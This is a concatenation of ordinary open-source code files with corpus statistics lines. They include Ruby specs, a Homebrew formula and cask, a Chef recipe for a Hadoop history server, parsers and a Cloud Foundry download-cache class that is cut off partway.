context 'when squashing only new files' do
let(:merge_request) { merge_request_with_only_new_files }
include_examples 'the squash succeeds'
end
context 'when squashing is disabled by default on the project' do
# Squashing is disabled by default, but it should still allow you
# to squash-and-merge if selected through the UI
let(:merge_request) { merge_request_with_only_new_files }
before do
merge_request.project.project_setting.squash_default_off!
end
include_examples 'the squash succeeds'
end
context 'when squashing is forbidden on the project' do
let(:merge_request) { merge_request_with_only_new_files }
before do
merge_request.project.project_setting.squash_never!
end
it 'raises a squash error' do
expect(service.execute).to match(
status: :error,
message: a_string_including('allow you to squash commits when merging'))
end
end
context 'when squashing is enabled by default on the project' do
let(:merge_request) { merge_request_with_only_new_files }
before do
merge_request.project.project_setting.squash_always!
end
include_examples 'the squash succeeds'
end
context 'when squashing with files too large to display' do
let(:merge_request) { merge_request_with_large_files }
include_examples 'the squash succeeds'
end
context 'git errors' do
let(:merge_request) { merge_request_with_only_new_files }
let(:error) { 'A test error' }
context 'with an error in Gitaly UserSquash RPC' do
before do
allow(repository.gitaly_operation_client).to receive(:user_squash)
.and_raise(Gitlab::Git::Repository::GitError, error)
end
it 'logs the error' do
expect(service).to receive(:log_error).with(exception: an_instance_of(Gitlab::Git::Repository::GitError), message: 'Failed to squash merge request')
service.execute
end
it 'returns an error' do
expect(service.execute).to match(status: :error, message: a_string_including('Squash'))
end
end
end
context 'when any other exception is thrown' do
let(:merge_request) { merge_request_with_only_new_files }
let(:merge_request_ref) { merge_request.to_reference(full: true) }
let(:exception) { RuntimeError.new('A test error') }
before do
allow(merge_request.target_project.repository).to receive(:squash).and_raise(exception)
end
it 'logs the error' do
expect(service).to receive(:log_error).with(exception: exception, message: 'Failed to squash merge request').and_call_original
expect(Gitlab::ErrorTracking).to receive(:track_exception).with(exception,
class: described_class.to_s,
merge_request: merge_request_ref,
merge_request_id: merge_request.id,
message: 'Failed to squash merge request',
save_message_on_model: false).and_call_original
service.execute
end
it 'returns an error' do
expect(service.execute).to match(status: :error, message: a_string_including('Squash'))
end
it 'cleans up the temporary directory' do
service.execute
expect(File.exist?(squash_dir_path)).to be(false)
end
end
end
end
| 35.052846 | 195 | 0.689899 |
21408e6986ce504d239273c3c74ec63186337383 | 1,954 | # frozen_string_literal: true
module AtCoderFriends
  module Parser
    # parses problem page and extract modulo values
    module Modulo
      module_function

      # Sections scanned in priority order; the first section that yields
      # any modulo value wins (see #process).
      SECTIONS = [
        Problem::SECTION_OUT_FMT,
        Problem::SECTION_STATEMENT,
        Problem::SECTION_TASK,
        Problem::SECTION_INTRO
      ].freeze

      # One candidate modulo value in any of the markups the pages use:
      # <var>...</var>, \(998244353\), $...$, {...}, plain digit runs, or
      # Japanese numerals (e.g. 十億九).
      VALUE_PATTERN = %r{
        (?:
          <var>([^<>]+)</var>
          |\(([^()]+)\)
          |\\\(([^()]+)\\\)
          |\$([^$]+)\$
          |\{([^{}]+)\}
          |([\d,^+]+)
          |([一二三四五六七八九十百千万億]+)
        )
      }x.freeze

      # Japanese ("...で割った余り") and English ("modulo ...", "divided by ...")
      # phrasings around a value, e.g.:
      #   <var>1,000,000,007</var> (素数)で割った余り
      MOD_PATTERN = /
        (?:
          #{VALUE_PATTERN}\s*(?:\([^()]+\)\s*)?で割った(?:剰余|余り|あまり)
          |(?:modulo|mod|divid(?:ed|ing)\s*by)\s*#{VALUE_PATTERN}
        )
      /xi.freeze

      # Scans the problem's sections for modulo constants and appends them
      # to pbm.constants; stops at the first section producing any match.
      def process(pbm)
        mods = []
        SECTIONS.any? do |section|
          next unless (html = pbm.sections[section]&.html)

          !(mods = parse(html)).empty?
        end
        pbm.constants += mods
      end

      # Extracts unique normalized modulo values from an HTML fragment and
      # wraps each in a Problem::Constant named 'mod'.
      def parse(str)
        str = normalize_content(str)
        str
          .scan(MOD_PATTERN)
          .map(&:compact)
          .map { |(v)| normalize_value(v) }
          .reject(&:empty?)
          .uniq
          .map { |v| Problem::Constant.new('mod', :mod, v) }
      end

      # Normalizes page text before matching: folds whitespace, strips
      # characters outside the expected Japanese/ASCII set, and rewrites the
      # various TeX/HTML spellings of "mod" to the bare word.
      # NOTE(review): the first argument to tr should be the full-width
      # alphanumeric range (０-９Ａ-Ｚａ-ｚ) so full-width characters fold to
      # ASCII -- verify the encoding survived copy/paste.
      def normalize_content(s)
        s
          .tr('0-9A-Za-z', '0-9A-Za-z')
          .gsub(/[[:space:]]/, ' ')
          .gsub(%r{[^一-龠_ぁ-んァ-ヶーa-zA-Z0-9 -/:-@\[-`\{-~]}, '')
          .gsub(/{\\[a-z]+\s*mod\s*}\\?/i, 'mod') # {\rm mod}, {\bmod} -> mod
          .gsub(/\\[a-z]+\s*{\s*mod\s*}\\?/i, 'mod') # \text{mod} -> mod
          .gsub(%r{<var>\s*mod\s*</var>}i, 'mod') # <var>mod</var> -> mod
      end

      # Reduces a matched value to its bare form by dropping trailing
      # parentheticals/equations and stray formatting characters.
      def normalize_value(s)
        s
          .gsub(/\A([^(=]+)[(=].*\z/, '\1') # 1000000007 (10^9+7), ... =10^9+7
          .gsub(/[{}()=\\ ]/, '')
      end
    end
  end
end
| 26.053333 | 78 | 0.42784 |
4a2bdbbf26976554333c56c0a7e2914f38982a2d | 2376 | class MinimalRacket < Formula
  desc "Modern programming language in the Lisp/Scheme family"
  homepage "https://racket-lang.org/"
  url "https://mirror.racket-lang.org/installers/7.9/racket-minimal-7.9-src-builtpkgs.tgz"
  sha256 "293aa8ef709a6240472f16833351ba66a9e461261d2813c7fb1cc5ddf59c3000"
  license any_of: ["MIT", "Apache-2.0"]

  # Detect new upstream versions by scraping the all-versions page.
  livecheck do
    url "https://download.racket-lang.org/all-versions.html"
    regex(/>Version ([\d.]+)/i)
  end

  bottle do
    cellar :any
    sha256 "330c0724e1315eaec481eaa96842cda06c6b33c613d10fed2c619c4f675c5bd2" => :catalina
    sha256 "809d6cf0d6e8af29fe6175b5442bdd064b875b1a7653b570353b536f83ff3901" => :mojave
    sha256 "13c1be2585bffe2252ce5cdc1357ba0bc9f5675cbd4ffd4d474e1a40c597ef20" => :high_sierra
    sha256 "7ebcc1cbaf9dc1f77239082f63c1e0a537b0cfcfc8929c59343be02c053527de" => :x86_64_linux
  end

  uses_from_macos "libffi"

  # these two files are amended when (un)installing packages
  skip_clean "lib/racket/launchers.rktd", "lib/racket/mans.rktd"

  # Builds racket from the bundled src/ tree with an origtree=no layout so
  # files land under the Homebrew prefix.
  def install
    # configure racket's package tool (raco) to do the Right Thing
    # see: https://docs.racket-lang.org/raco/config-file.html
    inreplace "etc/config.rktd", /\)\)\n$/, ") (default-scope . \"installation\"))\n"

    cd "src" do
      args = %W[
        --disable-debug
        --disable-dependency-tracking
        --enable-origtree=no
        --enable-macprefix
        --prefix=#{prefix}
        --mandir=#{man}
        --sysconfdir=#{etc}
        --enable-useprefix
      ]

      system "./configure", *args
      system "make"
      system "make", "install"
    end
  end

  def caveats
    <<~EOS
      This is a minimal Racket distribution.
      If you want to build the DrRacket IDE, you may run:
        raco pkg install --auto drracket

      The full Racket distribution is available as a cask:
        brew cask install racket
    EOS
  end

  # Smoke-tests the interpreter and verifies raco's generated config.
  test do
    output = shell_output("#{bin}/racket -e '(displayln \"Hello Homebrew\")'")
    assert_match /Hello Homebrew/, output

    # show that the config file isn't malformed
    output = shell_output("'#{bin}/raco' pkg config")
    assert $CHILD_STATUS.success?
    assert_match Regexp.new(<<~EOS), output
      ^name:
      #{version}
      catalogs:
      https://download.racket-lang.org/releases/#{version}/catalog/
      default-scope:
      installation
    EOS
  end
end
| 30.857143 | 94 | 0.677609 |
e802476a35e9aee31437101c43c369ebb0d719bc | 1,755 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe VariablesController, type: :controller do
  describe '#index' do
    context 'one orphaned variable' do
      let!(:variable) { FactoryBot.create :variable }
      before { get :index }
      it { expect(assigns(:variables)).to eq [variable] }
    end

    context 'three orphaned variables' do
      let!(:variable) { FactoryBot.create :variable }
      let!(:variable_two) { FactoryBot.create :variable }
      let!(:variable_three) { FactoryBot.create :variable }
      before { get :index }
      it { expect(assigns(:variables).size).to eq 3 }
    end

    # When variables reference each other, the index is expected to list a
    # referenced (child) variable immediately before its parent.
    context 'two variables that refer to each other' do
      let!(:parent) { FactoryBot.create :variable, name: 'likes_to_eat_chocolate', variables: [child] }
      let!(:child) { FactoryBot.create :variable, name: 'likes_to_eat' }
      before { get :index }
      it { expect(assigns(:variables)).to eq [child, parent] }
    end

    # Deeper chains: each tree appears as a contiguous run; the runs are
    # grouped per family rather than interleaved.
    context 'Many variables that refer to each other' do
      let!(:parent_1) { FactoryBot.create :variable, name: 'likes_to_eat', variables: [child_1] }
      let!(:child_1) { FactoryBot.create :variable, name: 'likes_to_eat_chocolate', variables: [grandchild_1] }
      let!(:grandchild_1) { FactoryBot.create :variable, name: 'likes_to_eat_chocolate_eggs' }
      let!(:parent_2) { FactoryBot.create :variable, name: 'likes_to_drink', variables: [child_2] }
      let!(:child_2) { FactoryBot.create :variable, name: 'likes_to_drink_water' }
      before { get :index }
      # These appear in alphabetical order
      it {
        expect(assigns(:variables)).to eq [parent_2, child_2, parent_1,
                                           child_1, grandchild_1]
      }
    end
  end
end
| 38.152174 | 111 | 0.653561 |
ff5b0366ecadcca5fd04a7c35570139fa58b302a | 444 | cask 'omnioutliner' do
  version '5.4.1'
  sha256 '2f7147aa867ae2ba768ecdef58cc085df64216e123f836c7653d627426d6ffcd'

  # Download URL interpolates the version; the appcast only varies by
  # major version (OmniOutliner5, OmniOutliner6, ...).
  url "https://downloads.omnigroup.com/software/MacOSX/10.14/OmniOutliner-#{version}.dmg"
  appcast "https://update.omnigroup.com/appcast/com.omnigroup.OmniOutliner#{version.major}"
  name 'OmniOutliner'
  homepage 'https://www.omnigroup.com/omnioutliner/'

  depends_on macos: '>= :high_sierra'

  app 'OmniOutliner.app'
end
| 31.714286 | 91 | 0.772523 |
6105f9909de1aac2ab86e9126ca399b31254d6e7 | 1056 | module LibTAD
  module Astronomy
    # All valid astronomy event classes
    # (frozen so the list cannot be mutated at runtime; presumably used to
    # validate/compose API request filters — confirm against the client code)
    ASTRONOMY_EVENT_CLASS = [
      # Combination of all known classes.
      :all,
      # The current phase for the place requested. Additional attributes for illumination (moon), azimuth, distance.
      :current,
      # Day length. Day length is not reported as an event, but as a separate attribute.
      :daylength,
      # Meridian (Noon, highest point) and Anti-Meridian (lowest point) events.
      :meridian,
      # Moon phase events. Additionally to the phase events (only occurring on four days per lunar month),
      # an additional attribute for the current moon phase is reported for every day.
      :phase,
      # Set and rise events. Event times take atmospheric refraction into account.
      :setrise,
      # Combination of all 3 twilight classes.
      :twilight,
      # Civil twilight (-6°).
      :twilight6,
      # Nautical twilight (-12°).
      :twilight12,
      # Astronomical twilight (-18°).
      :twilight18
    ].freeze
  end
end
| 27.789474 | 117 | 0.655303 |
874563504a409cfebb0159ddb14d6b618d8e504a | 1,059 | class AddFlightFieldsToTrip < ActiveRecord::Migration
# Adds the flight/hotel booking columns to the trips table.
# All columns are plain strings (including the time fields, which store
# free-form values rather than timestamps).
def up
  flight_columns = %i[
    reservation_number airline flight_number connection_time
    loyalty_account_number hotel hotel_address hotel_url
    check_in_time check_out_time
  ]
  flight_columns.each { |column| add_column :trips, column, :string }
end
# Reverses #up: drops the same columns in the same order. The column type
# is passed to remove_column for symmetry with the add.
def down
  flight_columns = %i[
    reservation_number airline flight_number connection_time
    loyalty_account_number hotel hotel_address hotel_url
    check_in_time check_out_time
  ]
  flight_columns.each { |column| remove_column :trips, column, :string }
end
end
| 37.821429 | 58 | 0.732767 |
bb5261c492016c789043ae01a35eb95d50f3cf02 | 3,723 | #
# Author:: Serdar Sutay <[email protected]>
# Author:: Patrick Wright <[email protected]>
#
# Copyright (c) 2016, Chef Software, Inc. <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Shared install/upgrade/uninstall behaviour mixed into the chef_ingredient
# provider. Relies on helper methods defined on the including provider
# (new_resource, ingredient_package_name, installer, custom_repo_recipe,
# etc. — defined elsewhere in this cookbook).
module ChefIngredient
  module DefaultHandler
    def handle_install
      configure_package(:install)
    end

    def handle_upgrade
      configure_package(:upgrade)
    end

    def handle_uninstall
      package ingredient_package_name do
        action :remove
      end
    end

    private

    # Chooses the install strategy: an explicit local/remote package file
    # wins, then a custom package repository, otherwise download from the
    # omnitruck-style channel.
    def configure_package(action_name)
      if new_resource.package_source
        configure_from_source_package(action_name)
      elsif use_custom_repo_recipe?
        # Use the custom repository recipe.
        include_recipe custom_repo_recipe
        configure_from_repo(action_name)
      else
        configure_from_channel(action_name)
      end
    end

    # Installs from a concrete package file. local_path (when given by
    # configure_from_channel) overrides the resource's package_source.
    def configure_from_source_package(action_name, local_path = nil)
      package new_resource.product_name do
        action action_name
        package_name ingredient_package_name
        options new_resource.options
        source local_path || new_resource.package_source
        # Pick the low-level package provider by platform family, since we
        # are installing a file rather than going through the system repo.
        provider value_for_platform_family(
          'debian' => Chef::Provider::Package::Dpkg,
          'rhel' => Chef::Provider::Package::Rpm,
          'windows' => Chef::Provider::Package::Windows
        )

        if new_resource.product_name == 'chef'
          # We define this resource in ChefIngredientProvider
          notifies :run, 'ruby_block[stop chef run]', :immediately
        end
      end
    end

    # Installs via the (already configured) package repository.
    def configure_from_repo(action_name)
      # Foodcritic doesn't like timeout attribute in package resource
      package new_resource.product_name do # ~FC009
        action action_name
        package_name ingredient_package_name
        options package_options_with_force
        timeout new_resource.timeout

        # If the latest version is specified, we should not give any version
        # to the package resource.
        unless version_latest?(new_resource.version)
          version version_for_package_resource
        end

        if new_resource.product_name == 'chef'
          # We define this resource in ChefIngredientProvider
          notifies :run, 'ruby_block[stop chef run]', :immediately
        end
      end
    end

    # Resolves the artifact for the requested channel/version, downloads it
    # into Chef's file cache, then delegates to
    # configure_from_source_package with the local path.
    def configure_from_channel(action_name)
      cache_path = Chef::Config[:file_cache_path]

      # installer.artifact_info returns [] when no artifact matches.
      artifact_info = installer.artifact_info
      if artifact_info == []
        raise <<-EOH
No package found for '#{new_resource.product_name}' with version '#{new_resource.version}' for current platform in '#{new_resource.channel}' channel.
Check that the package exists.
EOH
      end
      remote_artifact_path = artifact_info.url
      local_artifact_path = File.join(cache_path, ::File.basename(remote_artifact_path))

      converge_by "Download #{new_resource.product_name} package from #{remote_artifact_path}\n" do
        remote_file local_artifact_path do
          source remote_artifact_path
          mode '0644'
          checksum installer.artifact_info.sha256
          backup 1
        end
      end

      configure_from_source_package(action_name, local_artifact_path)
    end
  end
end
| 32.094828 | 149 | 0.695676 |
7ab2b98b79149c235869d7997a798489dc798aac | 1,035 | # Be sure to restart your server when you modify this file.
Rails.application.configure do
  # Version of your assets; bump it to expire every compiled asset.
  config.assets.version = '1.0'

  # Add additional assets to the asset load path.
  # Rails.application.config.assets.paths << Emoji.images_path

  # Make Yarn-managed packages under node_modules resolvable by Sprockets.
  config.assets.paths << Rails.root.join('node_modules')

  # Precompile additional assets. application.js, application.css, and all
  # non-JS/CSS files in app/assets are already included by default.
  config.assets.precompile += [/\w+\/*.js/]
  config.assets.precompile += %w[
    accept_tos.js
    blocks.js
    board_sections.js
    global.js
    icons.js
    messages.js
    paginator.js
    reorder.js
  ]
  config.assets.precompile += %w( layouts/*.css tinymce.css )
end
| 36.964286 | 78 | 0.728502 |
03d5f50a5c52f995f7db9e9465c13f75b55ca479 | 833 | # frozen_string_literal: true
require "test_helper"
class NoteTest < Minitest::Test
  # Round-trips a raw API-style hash through Note.from_hash and checks that
  # every attribute lands on the model. Of note: the "hash" key maps to
  # #digest, and the timestamp strings are parsed into Time objects.
  def test_from_hash
    attributes = {
      "id" => "8e5d6964bb810e0050b0",
      "title" => "StarCraft beta coming this week!",
      "hash" => "0c9c30f60cadabd31415",
      "created_at" => "2010-02-11 03:46:56",
      "updated_at" => "2010-02-11 03:47:47",
      "length" => 19,
      "text" => "This is a test note"
    }

    note = Note.from_hash(attributes)

    assert_equal "8e5d6964bb810e0050b0", note.id
    assert_equal "StarCraft beta coming this week!", note.title
    assert_equal "0c9c30f60cadabd31415", note.digest
    assert_equal Time.new(2010, 2, 11, 3, 46, 56), note.created_at
    assert_equal Time.new(2010, 2, 11, 3, 47, 47), note.updated_at
    assert_equal 19, note.length
    assert_equal "This is a test note", note.text
  end
end
| 30.851852 | 66 | 0.655462 |
6a83b44a637e94bde7bc600d598ae21821bb90e7 | 2129 | module Dedup
  # Mixin giving a model a fluent Elasticsearch query builder via
  # Model.searcher. Relies on ActiveSupport (#blank?, Concern) and an
  # elasticsearch-model-style Model.search defined elsewhere.
  module Elasticsearchable
    extend ActiveSupport::Concern

    included do
      class << self
        def searcher
          BasicSearcher.new(self)
        end
      end

      # NOTE(review): the following two blocks monkey-patch core classes
      # (guarded so they only apply once). #contains_blank? answers "is this
      # structure blank, or does it contain a blank value anywhere?".
      Hash.class_eval do
        def contains_blank?
          self.blank? || self.values.contains_blank?
        end unless Hash.instance_methods.include?(:contains_blank?)
      end

      Array.class_eval do
        def contains_blank?
          # `break` (with no value) makes #map return nil, so `.nil?` is
          # true exactly when some element was blank (recursing through
          # nested hashes/arrays via their own #contains_blank?).
          self.blank? ||
            self.map do |value|
              if value.respond_to? :contains_blank?
                value.contains_blank? and break
              else
                value.blank? and break
              end
            end.nil?
        end unless Array.instance_methods.include?(:contains_blank?)
      end
    end

    # Accumulates filter/sort/source options and renders them into a
    # filtered-query ES request body. Builder methods return self so calls
    # can be chained; blank arguments are silently ignored.
    class BasicSearcher
      def initialize(target_class)
        @target_class = target_class
        reset!
      end

      # Wraps the Elasticsearch query logic
      def search(page: 1, per: 20)
        yield self if block_given?
        @target_class.search(query).page(page).per(per)
      end

      # Renders the accumulated state as a `filtered` query body
      # (pre-ES-5 syntax): must/must_not as filters, should as query.
      def query
        {
          _source: @source,
          sort: @sort,
          query: {
            filtered: {
              filter: {
                bool: {
                  must: @must_filters,
                  must_not: @must_not_filters
                }
              },
              query: {
                bool: {
                  should: @should_filters
                }
              }
            }
          }
        }
      end

      def source(bool)
        @source = bool
      end

      # Sets the sort clause unless either argument is blank; always
      # returns self (the low-precedence `or` is used for control flow).
      def sort(field, order)
        [field, order].contains_blank? or @sort = {field => {order: order}}; self
      end

      # Defines #should, #must and #must_not, each appending {type => query}
      # to its filter list unless an argument is blank; each returns self.
      %w[should must must_not].each do |action|
        define_method action do |type, query|
          [type, query].contains_blank? or self.send("#{action}_filters") << {type => query}; self
        end
      end

      def reset!
        @should_filters, @must_filters, @must_not_filters = [], [], []
        @sort = {}
        @source = true
      end

      private

      attr_reader :should_filters, :must_filters, :must_not_filters
    end
  end
end
| 22.892473 | 98 | 0.509629 |
e8eb9703d1c6bb9a42b5f301b3880aece649c2ec | 1,628 | # frozen_string_literal: true
module HathiTrust::SIP
  # Handles MD5 checksums in a checksum.md5 or similar format
  class Checksums
    # @return [Hash] all checksums in the given collection
    attr_reader :checksums

    # Initialize a new set of Checksums. Ignores directory names in the
    # file names.
    #
    # @param checksum_file [IO] IO stream (or anything responding to
    #   #each_line) that contains a list of checksums and files
    # NOTE(review): check_for_bom calls #bytes/#force_encoding, which are
    # String methods — in practice this appears to expect a String, not an
    # IO; confirm against callers.
    def initialize(checksum_file)
      @checksums = {}
      check_for_bom(checksum_file).each_line() do |line|
        # Assignments inside the condition: m is the 32-hex-digit match,
        # filename is the rest of the line with delimiters stripped.
        if m = line.strip.match(/\b[a-fA-F0-9]{32}\b/) and filename = extract_filename(m)
          checksum = m.to_s.downcase
          @checksums[File.basename(filename)] = checksum
        end
      end
    end

    # Looks up the stored checksum for a (basename, lowercased) filename.
    def checksum_for(filename)
      @checksums[filename]
    end

    private

    # Detects a UTF-16 byte-order mark; if present, reinterprets the data
    # in that encoding, drops the BOM character ([1..-1]) and transcodes to
    # US-ASCII. Otherwise returns the input unchanged.
    def check_for_bom(checksum_file)
      maybe_bom = checksum_file.bytes[0,2]
      if maybe_bom == [0xFF,0xFE]
        encoding = 'UTF-16LE'
      elsif maybe_bom == [0xFE,0xFF]
        encoding = 'UTF-16BE'
      end

      if encoding
        checksum_file.force_encoding(encoding)[1..-1].encode("US-ASCII")
      else
        checksum_file
      end
    end

    # Everything on the line except the checksum itself (pre_match +
    # post_match), cleaned up and lowercased.
    def extract_filename(match)
      (match.pre_match.strip + match.post_match.strip).
        # Remove delimeters & random asterisks that some md5 programs put in there.
        # Hope nobody has legit filenames with leading or trailing commas or asterisks
        gsub(/^[*,]/,'').
        gsub(/[*,]$/,'').
        # Handle windows-style paths
        tr('\\','/').
        downcase
    end
  end
end
| 27.59322 | 89 | 0.630835 |
797d443c2481092ccae6755928ab3e3d94e18da6 | 2585 | include_recipe 'bcpc-hadoop::hadoop_config'
::Chef::Recipe.send(:include, Bcpc_Hadoop::Helper)
::Chef::Resource::Bash.send(:include, Bcpc_Hadoop::Helper)

# Install the HDP-versioned historyserver package and point hdp-select at
# the active release. (hwx_pkg_str/hdp_select come from Bcpc_Hadoop::Helper.)
%w{hadoop-mapreduce-historyserver}.each do |pkg|
  package hwx_pkg_str(pkg, node[:bcpc][:hadoop][:distribution][:release]) do
    action :install
  end
  hdp_select(pkg, node[:bcpc][:hadoop][:distribution][:active_release])
end

#
# The following resource is to fix incorrect permissions set in
# existing /user/history directory
#
bash "set-correct-user-history-dir-permission" do
  code <<-EOH
hdfs dfs -chmod -R 0770 /user/history
hdfs dfs -chmod 1777 /user/history
hdfs dfs -chmod 1777 /user/history/done
hdfs dfs -chmod 1777 /user/history/done_intermediate
EOH
  user "hdfs"
  # Only runs when the dir exists AND done_intermediate is already sticky-777
  # (i.e. the previously mis-applied layout).
  only_if "hdfs dfs -test -d /user/history && hdfs dfs -ls /user/history/done_intermediate|grep drwxrwxrwt", :user => "hdfs"
end

# Create /user/history and its done/done_intermediate subdirs, sticky-777,
# owned by yarn:mapred; each is skipped when it already exists.
["", "done", "done_intermediate"].each do |dir|
  bash "create-hdfs-history-dir #{dir}" do
    code "hdfs dfs -mkdir /user/history/#{dir} && hdfs dfs -chmod 1777 /user/history/#{dir} && hdfs dfs -chown yarn:mapred /user/history/#{dir}"
    user "hdfs"
    not_if "hdfs dfs -test -d /user/history/#{dir}", :user => "hdfs"
  end
end

# Kerberos principals/keytabs for SPNEGO and the historyserver itself
# (configure_kerberos is a custom resource defined elsewhere in this cookbook).
configure_kerberos 'historyserver_spnego' do
  service_name 'spnego'
end

configure_kerberos 'historyserver_kerb' do
  service_name 'historyserver'
end

template "/etc/hadoop/conf/mapred-env.sh" do
  source "hdp_mapred-env.sh.erb"
  # NOTE(review): 0655 is an unusual mode (group/other x without owner x) —
  # possibly 0755 was intended; confirm before changing.
  mode 0655
end

# YARN application log dir in HDFS, world-writable with sticky bit.
bash "create-hdfs-history-dir" do
  code <<-EOH
hdfs dfs -mkdir -p /var/log/hadoop-yarn/apps
hdfs dfs -chmod -R 1777 /var/log/hadoop-yarn/apps
EOH
  user "hdfs"
  not_if "hdfs dfs -test -d /var/log/hadoop-yarn/apps", :user => "hdfs"
end

# Symlink the init script to the active HDP release; relinking kills the
# running daemon immediately so the service resource below restarts it.
link "/etc/init.d/hadoop-mapreduce-historyserver" do
  to "/usr/hdp/#{node[:bcpc][:hadoop][:distribution][:active_release]}/hadoop-mapreduce/etc/init.d/hadoop-mapreduce-historyserver"
  notifies :run, 'bash[kill mapred-historyserver]', :immediate
end

bash "kill mapred-historyserver" do
  code "pkill -u mapred -f historyserver"
  action :nothing
  # pkill exits 1 when no process matched; treat that as success too.
  returns [0, 1]
end

service "hadoop-mapreduce-historyserver" do
  supports :status => true, :restart => true, :reload => false
  action [:enable, :start]
  subscribes :restart, "link[/etc/init.d/hadoop-mapreduce-historyserver]", :immediate
  subscribes :restart, "template[/etc/hadoop/conf/hadoop-env.sh]", :delayed
  subscribes :restart, "template[/etc/hadoop/conf/mapred-site.xml]", :delayed
  subscribes :restart, "template[/etc/hadoop/conf/yarn-site.xml]", :delayed
  subscribes :restart, "log[jdk-version-changed]", :delayed
end
| 33.141026 | 144 | 0.72147 |
b9c0739ac89f98a21d4c0372dea1cbd9825df468 | 1436 | describe "DELETE /authorised_email_domains/:id", type: :request do
  let!(:email_domain) { create(:authorised_email_domain, name: "some.domain.org.uk") }
  let(:regex_gateway) { instance_spy(Gateways::S3, write: nil) }
  let(:email_domains_gateway) { instance_spy(Gateways::S3) }

  # Gateways::S3.new is stubbed to return the two spies in construction
  # order: regex gateway first, then the email-domains gateway. This is
  # order-dependent on how the controller builds its gateways.
  before { allow(Gateways::S3).to receive(:new).and_return(regex_gateway, email_domains_gateway) }

  context "when the user is a super admin" do
    before do
      https!
      sign_in_user(create(:user, :super_admin, :with_organisation))
    end

    it "deletes the email domain" do
      expect {
        delete super_admin_whitelist_email_domain_path(email_domain)
      }.to change(AuthorisedEmailDomain, :count).by(-1)
    end

    it "publishes the new regex list of authorised domains to S3" do
      delete super_admin_whitelist_email_domain_path(email_domain)

      expect(regex_gateway).to have_received(:write)
    end

    it "publishes the new list of email domains to S3" do
      delete super_admin_whitelist_email_domain_path(email_domain)

      expect(email_domains_gateway).to have_received(:write)
    end
  end

  context "when the user is not super admin" do
    before do
      https!
      sign_in_user(create(:user))
    end

    it "does not delete the email domain" do
      expect {
        delete super_admin_whitelist_email_domain_path(email_domain)
      }.to change(AuthorisedEmailDomain, :count).by(0)
    end
  end
end
| 32.636364 | 98 | 0.714485 |
3827cb5108460fc70fa0052e75861c2860fc1014 | 990 | # frozen_string_literal: true
describe Spotlight::ViewConfigurationsController, type: :controller do
  routes { Spotlight::Engine.routes }
  let(:exhibit) { FactoryBot.create(:exhibit) }

  # Visitors without curator/admin rights are bounced to the main app root.
  describe 'when the user is not authorized' do
    before do
      sign_in FactoryBot.create(:exhibit_visitor)
    end

    describe 'GET show' do
      it 'denies access' do
        get :show, params: { exhibit_id: exhibit }
        expect(response).to redirect_to main_app.root_path
        expect(flash[:alert]).to be_present
      end
    end
  end

  # Exhibit admins get the JSON list of available view types.
  describe 'when signed in' do
    let(:user) { FactoryBot.create(:exhibit_admin, exhibit: exhibit) }

    before { sign_in user }

    describe 'GET show' do
      it 'is successful' do
        get :show, params: { exhibit_id: exhibit, format: 'json' }
        expect(response).to be_successful
        available = JSON.parse(response.body)
        expect(available).to match_array %w[list gallery masonry slideshow]
      end
    end
  end
end
| 27.5 | 75 | 0.670707 |
f8d1d39a6188e5115376ac56dbfeee48effae9de | 407 | # frozen_string_literal: true
# This migration comes from spina_admin_conferences_engine (originally 20200420120946)
class RemoveTitleAndAbstractFromSpinaConferencesPresentations < ActiveRecord::Migration[6.0] # :nodoc:
  # Drops the now-unused title and abstract columns. Type and NOT NULL
  # options are supplied so the migration remains reversible.
  def change
    { title: :string, abstract: :text }.each do |column, type|
      remove_column :spina_conferences_presentations, column, type, null: false
    end
  end
end
| 40.7 | 102 | 0.818182 |
62bda850bd69216dd3a9c776450756fdbaf3da9e | 9,917 | # Encoding: utf-8
# Cloud Foundry Java Buildpack
# Copyright 2013 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'fileutils'
require 'java_buildpack/diagnostics'
require 'java_buildpack/diagnostics/logger_factory'
require 'java_buildpack/util'
require 'monitor'
require 'net/http'
require 'tmpdir'
require 'uri'
require 'yaml'
module JavaBuildpack::Util

  # A cache for downloaded files that is configured to use a filesystem as the backing store. This cache uses standard
  # file locking (<tt>File.flock()</tt>) in order ensure that mutation of files in the cache is non-concurrent across
  # processes. Reading files (once they've been downloaded) happens concurrently so read performance is not impacted.
  class DownloadCache

    # Creates an instance of the cache that is backed by the filesystem rooted at +cache_root+
    #
    # @param [String] cache_root the filesystem root for downloaded files to be cached in
    def initialize(cache_root = Dir.tmpdir)
      Dir.mkdir(cache_root) unless File.exists? cache_root
      @cache_root = cache_root
      @logger = JavaBuildpack::Diagnostics::LoggerFactory.get_logger
    end

    # Retrieves an item from the cache. Retrieval of the item uses the following algorithm:
    #
    # 1. Obtain an exclusive lock based on the URI of the item. This allows concurrency for different items, but not for
    #    the same item.
    # 2. If the the cached item does not exist, download from +uri+ and cache it, its +Etag+, and its +Last-Modified+
    #    values if they exist.
    # 3. If the cached file does exist, and the original download had an +Etag+ or a +Last-Modified+ value, attempt to
    #    download from +uri+ again. If the result is +304+ (+Not-Modified+), then proceed without changing the cached
    #    item. If it is anything else, overwrite the cached file and its +Etag+ and +Last-Modified+ values if they exist.
    # 4. Downgrade the lock to a shared lock as no further mutation of the cache is possible. This allows concurrency for
    #    read access of the item.
    # 5. Yield the cached file (opened read-only) to the passed in block. Once the block is complete, the file is closed
    #    and the lock is released.
    #
    # @param [String] uri the uri to download if the item is not already in the cache. Also used in the case where the
    #                     item is already in the cache, to validate that the item is up to date
    # @yieldparam [File] file the file representing the cached item. In order to ensure that the file is not changed or
    #                    deleted while it is being used, the cached item can only be accessed as part of a block.
    # @return [void]
    def get(uri)
      internet_up = DownloadCache.internet_available? uri, @logger
      filenames = filenames(uri)
      File.open(filenames[:lock], File::CREAT) do |lock_file|
        lock_file.flock(File::LOCK_EX)

